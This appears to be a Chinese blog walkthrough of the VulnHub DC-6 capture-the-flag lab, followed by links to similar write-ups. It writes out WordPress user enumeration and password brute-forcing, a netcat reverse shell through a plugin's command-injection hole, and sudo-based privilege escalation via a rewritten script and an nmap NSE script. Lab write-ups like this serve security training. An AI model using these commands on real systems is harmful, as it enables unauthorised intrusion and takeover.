vulnhub-DC-6靶機實戰

2021-02-23 RedTeam筆記
簡介

Vulnhub是一個滲透測試實戰網站,DC-6是該系列的第六版,只有一個終極flag。拿到則通關,以下內容是自身復現的過程,總結記錄下來,如有不足請多多指教。

下載地址

https://download.vulnhub.com/dc/DC-6.zip

開始滲透

主機探測:nmap -sP 192.168.1.*

埠探測:nmap -sV -A -p- 192.168.1.42

訪問web服務重定向到http://wordy/ 需要修改host文件,該站點為WordPress,首頁幾個頁面隨便看了下沒啥亮點,WordPress後臺路徑默認是wp-login.php 所以很容易想到

使用wpscan查找網站上的所有用戶:wpscan —url http://wordy/ -e u

根據下載地址處dc-6作者的提示

字典很大,132M的txt文件,我tm直接謝謝你全家

進行爆破:wpscan —url http://wordy/ -e u -P /usr/share/wordlists/rockyou.txt爆破出用戶是mark,密碼是helpdesk01,WordPress後臺登錄。

後臺activity monitor->Tools處存在命令執行(註:由於輸入框限制了長度需要改一下即可)

反彈shell:nc 192.168.1.41 7777 -e /bin/bash

切換交互式shell:python3 -c 'import pty;pty.spawn("/bin/bash")'在家目錄下發現用戶的密碼:graham/GSo7isUM1D4

ssh成功連接graham用戶,然後sudo -l查看一下能夠執行root權限的命令。

sudo -u以指定的用戶作為新的身份(不指定則為root權限)。修改該腳本:echo "/bin/bash" > backups.sh  切換用戶jens,並在jens用戶下使用sudo -l發現nmap可以免密root權限執行

利用nmap進行提權,先寫一個nmap腳本然後用--script進行加載,提權成功

echo 'os.execute("/bin/sh")' > getroot.nse
sudo nmap --script getroot.nse
#whoami
#cd /root
#ls
#cat theflag.txt

- END -

相關焦點

  • 簡單的DC-6靶機滲透實戰
    /mark:stuff./mark/stuff:things-to-do.txt./sarah:www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt Things to do:- Restore full functionality for the hyperdrive (need to speak to Jens)- Buy present for Sarah's farewell
  • Vulnhub 靶機實戰系列:DC -4
    下載地址:https://www.five86.com/dc-4.html則靶機DC-4 ip:192.168.188.159(NAT連接)攻擊機kalilinux ip:192.168.188.144用netdiscover -r 192.168.188.0/24 掃描ip,得到靶機ip 192.168.188.159先來埠掃描利用
  • 靶場滲透-Vulnhub-DC-6
    靶場地址:https://www.vulnhub.com/entry/dc-6,315/
  • Vulnhub 靶機實戰系列:DC -2
    下載地址:https://www.five86.com/dc-2.html則靶機DC-2 ip:192.168.188.157攻擊機kalilinux ip:192.168.188.144Flag:5個在測試之前需要修改一下host文件的配置,添加滲透靶機的IP位址和域名(訪問滲透靶機時80埠時,他會自動跳轉成dc-2 不修改會無法訪問。)
  • 【vulnhub】靶機-【DC系列】DC9(附靶機)
    www.ms08067.com)本文作者:大方子(Ms08067實驗室核心成員)主機信息Kali:192.168.56.113DC9:192.168.56.112實驗過程先進行主機探測,查找靶機的看到這個搜索頁面感覺可以嘗試下SQL注入這裡我們用Burp進行嘗試,發現的確存在注入點把請求信息導出為dc9.sqlmap,接下來用SQLmap進行遍歷python3 sqlmap.py ‐r C:\Users\DFZ\Desktop\dc9.sqlmap然後接下來用sqlmap導出數據
  • DC-4靶機解題思路
    說明:Vulnhub是一個滲透測試實戰網站
  • vulnhub靶機滲透-Connectthedots
    vulnhub靶機滲透-Connectthedots這個靶機比較腦洞,但是最後的提權過程挺有意思的。目標:/home/user.txt and /root/root.txt環境準備由於VMware會出現種種問題,於是改成了Virtual Box,而且Vulhub上的大部分靶機都是使用Virtual Box製作的附上一些相關的配置截圖:kali 2019.04第一塊網卡沒做修改添加了第二塊網卡vulnhub
  • Vulnhub ——DC-7靶機
    今天又把vulnhub的dc-7給打了,過程有點繞虛擬機ip:192.168.64.129然後再找到存活在192.168.64.0
  • DC-1靶機通關記錄
    一、靶機搭建官網連結:https://download.vulnhub.com/dc/靶機下載地址:http://www.five86
  • 滲透測試實戰——DC-5+DC-6靶機入侵
    愛寫靶機文章的我又來了…最近工作忙到飛起,根本沒空忙自己的事情..所以遲遲沒有更新,這次給大家帶來的是DC-5、DC-6的靶機wp,本來準備把 DC-2-DC-4的一起寫的,結果發現已經有小夥伴搶先寫了DC-5: http://www.five86.com/dc-5.htmlDC-6: http://www.five86.com/dc-6.html
  • 技術乾貨 | VulnHub通關日記-DC_4-Walkthrough
    歡迎各位添加微信號:qinchang_198231  加入安全+ 交流群 和大佬們一起交流安全技術VulnHub通關DC_4-Walkthrough靶機介紹只有一個標誌,但是從技術上講,有多個入口點,就像上次一樣,沒有任何線索靶機地址:https://www.vulnhub.com/entry/dc-4,313/這邊靶機和前一個是一樣的,只需要獲取一個Flag就行了,在/root目錄下!
  • vulnhub系列之靶機Five86-2練習
    1、nmap -sn 192.168.1.0/24掃描區域網下的存活主機,找到靶機ip2、nmap -sS
  • vulnhub系列之靶機DC-8練習
    ip192.168.1.62、nmap -sS -A -p- 192.168.1.6掃描詳細信息,80綁定了Drupal76、sqlmap -u http://192.168.1.6/?nid=3 --dbms mysql -D d7db --tables枚舉d7db庫下的所有表
  • Vulnhub-Gigachad靶機復現
    靶機介紹靶機地址:http://www.vulnhub.com/entry/gigachad-1,657/靶機難度:簡單靶機目標:get flag開整6  查看ip狀態二、靶機復現1 探測靶機的IP位址,使用 nmap 快速掃描 C 段nmap -sn -v -n -PE 192.168.154.0/24 --min-rate=2000
  • vulnhub系列之靶機DC-5練習
    連結:https://pan.baidu.com/s/1wklyEuS5yJxLFKpq2Pp5Xg 提取碼:xcj41、nmap -sA 192.168.1.0/24掃描靶機ip地址2、nmap -sS -A -p- 192.168.1.8掃描靶機更詳細信息,掃到了3個埠,其中80綁定了nginx服務
  • vulnhub系列之靶機Kevgir練習
    1、靶機下載地址https://www.vulnhub.com/entry/kevgir-1,137/2、nmap -sn 192.168.1.0
  • DC-3靶機通關記錄
    一、靶機搭建官網連結:https://vulnhub.com/靶機下載地址:http://www.five86.com
  • Vulnhub靶機Five86-2詳細解析
    VulnHub滲透測試實戰靶場Jarbas 1.0https://www.hetianlab.com/expc.do?
  • Vulnhub-靶機-PWNOS: 2.0 (PRE-RELEASE)
    本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關靶機下載之後使用僅主機模式加載到本地
  • Vulnhub靶機 - SOCIAL NETWORK實踐
    %i//發現兩個網段for /l %i in (1,1,3) do for /l %j in (1,1,3) do ping -n 1 192.168.%i.%j//linux//發現一個網段for i in $(seq 1 10);do ping -c 1 172.17.0.$